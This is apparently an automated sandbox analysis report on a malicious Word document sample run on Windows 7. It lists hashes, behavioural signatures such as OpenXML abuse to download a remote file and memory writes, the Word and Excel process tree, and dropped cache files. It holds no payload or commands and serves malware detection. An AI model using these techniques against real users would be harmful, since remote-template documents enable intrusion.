Analysis

  • max time kernel
    149s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    23-07-2024 05:58

General

  • Target

    6665ab44db118b972ce2a88e66118fb8_JaffaCakes118.doc

  • Size

    235KB

  • MD5

    6665ab44db118b972ce2a88e66118fb8

  • SHA1

    fee2da365e916da5c67e7c9ac1f011651b538009

  • SHA256

    3fb97d9c2e1864424882af8744978f5c367b27f5fa6b2a857621f126e758a6f9

  • SHA512

    0ebcd4d975f56369d1b53b9c3c0f78a4a2e5bd1e1a28a083286d08318bdc3372b793811b5fd692de9fbcc5132f960c3a1b32149ee35b1386e70bfc7f5cd9f71b

  • SSDEEP

    1536:zterThwxEM5OsmqrmrAK9hbZQHrTPUyZK/dRYiX/CN7Ta861YrkyXkHx:zUwxv5OsmqrmrAKHigdSivCFTH6C2Hx

Score
7/10

Malware Config

Signatures

  • Abuses OpenXML format to download file from external location 4 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 13 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\6665ab44db118b972ce2a88e66118fb8_JaffaCakes118.doc"
    1⤵
    • Abuses OpenXML format to download file from external location
    • Drops file in Windows directory
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:688
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2472
    • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
      "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
      1⤵
      • Abuses OpenXML format to download file from external location
      • Enumerates system info in registry
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      PID:2124
    • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
      "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
      1⤵
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious use of SetWindowsHookEx
      PID:2532
    • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
      "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
      1⤵
      • Abuses OpenXML format to download file from external location
      • Enumerates system info in registry
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      PID:2776
    • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
      "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
      1⤵
      • Abuses OpenXML format to download file from external location
      • Enumerates system info in registry
      • Suspicious use of SetWindowsHookEx
      PID:1804

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSD

      Filesize

      128KB

      MD5

      c138d29f3ca84c790030d441a99b38c0

      SHA1

      39bad3e1a87bee87f1030f9c1d12eda88e139ce7

      SHA256

      4e6b4ce2c4c6d47b74b8b85db93d52af84cd46654879e8cd1b21ea5b1e399dce

      SHA512

      69679671c49909865b1a6867cb0ac276e7d5f715dda2434bdc6988b97e1d7e780abebfceeee7a7f3489902c748a15c2902f12f303bf2ce8d920997c2dcc2cb65

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{9D68B317-C517-4CD8-9B6B-3B4232F27C37}.FSD

      Filesize

      128KB

      MD5

      4076eae8d81022c9a8d66638efb5f77b

      SHA1

      8a5e4edf90b4d464d6ed9b446705f59ab3743a87

      SHA256

      df8a38085fff7ca7b59c379f3040691011473e6e11b567f1f72e2472a119104c

      SHA512

      d174427c1ae809f49b9d50a5e6c5c8881fdebe5767bad44ccfaec8df75872f54099a8502fc29f22e3d576bdbbbbada68a3553e2927e37d331ba4700106d943ce

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSF

      Filesize

      114B

      MD5

      06a0ef7eb18c37c07ca9a34d4160efd1

      SHA1

      031db20daee53c9acce262a82cec2a17bb10675a

      SHA256

      4fdd7305291df86be389770b0a97f524e7a79f17fe0b671415dedb0885fa8457

      SHA512

      3dbf849e85b2da4134d0b98b9a3f01ac8d20434f5f7cca140ef48aa7b289c985d22c0efc158ba6e6da10805b3052660a0a07cfa4d48faa5a49d5894ff7f7692c

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

      Filesize

      128KB

      MD5

      8822bdedb818b661c8219569da769992

      SHA1

      cbd4645786f606b921c823b9c1723579f5ac4b2d

      SHA256

      e6e149128fab0cf0f7e27b09001e0e0e675214036e8d4e8b70ae9dabc14be62a

      SHA512

      1922a189f341d7edc9a8b1940a5bc022a79d728075029ffcfdfa7c3af0728feb18025eb951ba29a7f432fff8bc17e49afef03d99700db216497bacafd4939930

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{C3BA8A24-F369-4AC2-BFB4-594285910D2E}.FSD

      Filesize

      128KB

      MD5

      3c018b9f8bdc836bf038bc651a36a565

      SHA1

      1aa85ece8aed5bc4257530757d615b2a3c4c1c62

      SHA256

      a217c417491d1fc091bd88de11a34d8f234f209bde29324ed994b07d224aa35a

      SHA512

      ba1c725c59798667edc4a6ef6bc6981219af0e29ad43bbfff2affd600c9f2a43f7b8a662855c58ac1f330aed39c7da3c6fa22a38d8c5391964c0e56f5a9a9de3

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSF

      Filesize

      114B

      MD5

      81fc781f4ea5a6bf6ba4357691e78671

      SHA1

      fa9049e8f4cb31220446e5e0b439fb74a9946352

      SHA256

      5776f0a9e68c038f2243dac8b6a779ee7eed8a1660207527e629241f44790013

      SHA512

      8243aa9f25b33264180875744a7a45bfcc11aeeab66177c559b9e0beb2a98c63bad50367f7b1cc319a10af9885e013dad2b65e80225d7703dc372cd5a3612cf6

    • C:\Users\Admin\AppData\Local\Temp\VBE\MSForms.exd

      Filesize

      143KB

      MD5

      537b53dd99d261f6b6c8ed93448d583b

      SHA1

      0f3c056593f7359da96f759fc0a27fc5c0474241

      SHA256

      427427b4a498c5d4246d454bfb11ecc3d532e0601b83187b1b23d3a84264e89b

      SHA512

      9c516409b087d0c3010b423c5521dd0a47011c71c9d2879e870f95056559a11d54229eb6b8799cd65251edc3720ff246670727d8a48b883b4ac264c1f491f5a2

    • C:\Users\Admin\AppData\Local\Temp\{9305588A-1ECB-4B17-87BA-0B14C37DACF4}

      Filesize

      128KB

      MD5

      6cae94b5c1ac2709a4ab72f9a0a4e2d5

      SHA1

      53eff141d2af533be527778c69b81f86986e4b3f

      SHA256

      936a82dbb443032a193d0815756bc6c182e9b2215bb0e95b27ec1ca2717bcf6f

      SHA512

      e0540a16b66d15eb1edf4eba23d920dee3022e3c8e84f9a530d803a0aaf7aec1e4a28c72d6c13b745436aa3f494578c9426d42756f937b4667ef79b32a872ef8

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      19KB

      MD5

      ee448b2f4ad5e739a46dbf159ff1edb0

      SHA1

      504534902c94e2000f37f475043e78777dbca60e

      SHA256

      9873e241cabe447017727d3661a016d4a3238d6448e9d00d4e21600e38def786

      SHA512

      39cccd918863c0c469b3666637886e1cdd949667e3bd9310ecd6a46a834fc541d85ffba617bde4971ef8062c73def4cb824e9f93993159775dc406f96d99b397

    • C:\Users\Admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

      Filesize

      2B

      MD5

      f3b25701fe362ec84616a93a45ce9998

      SHA1

      d62636d8caec13f04e28442a0a6fa1afeb024bbb

      SHA256

      b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

      SHA512

      98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

    • memory/688-59-0x0000000004B30000-0x0000000004D30000-memory.dmp

      Filesize

      2.0MB

    • memory/688-60-0x000000000EA00000-0x000000000EB00000-memory.dmp

      Filesize

      1024KB

    • memory/688-9-0x00000000714BD000-0x00000000714C8000-memory.dmp

      Filesize

      44KB

    • memory/688-2-0x00000000714BD000-0x00000000714C8000-memory.dmp

      Filesize

      44KB

    • memory/688-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/688-0-0x000000002FEE1000-0x000000002FEE2000-memory.dmp

      Filesize

      4KB

    • memory/2124-1022-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2532-1029-0x0000000000320000-0x0000000000420000-memory.dmp

      Filesize

      1024KB

    • memory/2532-1077-0x0000000000320000-0x0000000000420000-memory.dmp

      Filesize

      1024KB

    • memory/2532-1146-0x0000000000320000-0x0000000000420000-memory.dmp

      Filesize

      1024KB

    • memory/2532-1242-0x0000000000320000-0x0000000000420000-memory.dmp

      Filesize

      1024KB

    • memory/2532-1194-0x0000000000320000-0x0000000000420000-memory.dmp

      Filesize

      1024KB

    • memory/2532-1291-0x0000000000320000-0x0000000000420000-memory.dmp

      Filesize

      1024KB

    • memory/2532-1339-0x0000000000320000-0x0000000000420000-memory.dmp

      Filesize

      1024KB

    • memory/2532-1387-0x0000000000320000-0x0000000000420000-memory.dmp

      Filesize

      1024KB

    • memory/2532-1435-0x0000000000320000-0x0000000000420000-memory.dmp

      Filesize

      1024KB

    • memory/2532-1030-0x0000000000320000-0x0000000000420000-memory.dmp

      Filesize

      1024KB

    • memory/2532-1032-0x0000000000320000-0x0000000000420000-memory.dmp

      Filesize

      1024KB

    • memory/2532-1033-0x0000000000320000-0x0000000000420000-memory.dmp

      Filesize

      1024KB

    • memory/2532-1034-0x0000000000320000-0x0000000000420000-memory.dmp

      Filesize

      1024KB

    • memory/2532-1031-0x0000000000320000-0x0000000000420000-memory.dmp

      Filesize

      1024KB

    • memory/2532-1489-0x0000000000320000-0x0000000000420000-memory.dmp

      Filesize

      1024KB

    • memory/2532-1491-0x0000000000320000-0x0000000000420000-memory.dmp

      Filesize

      1024KB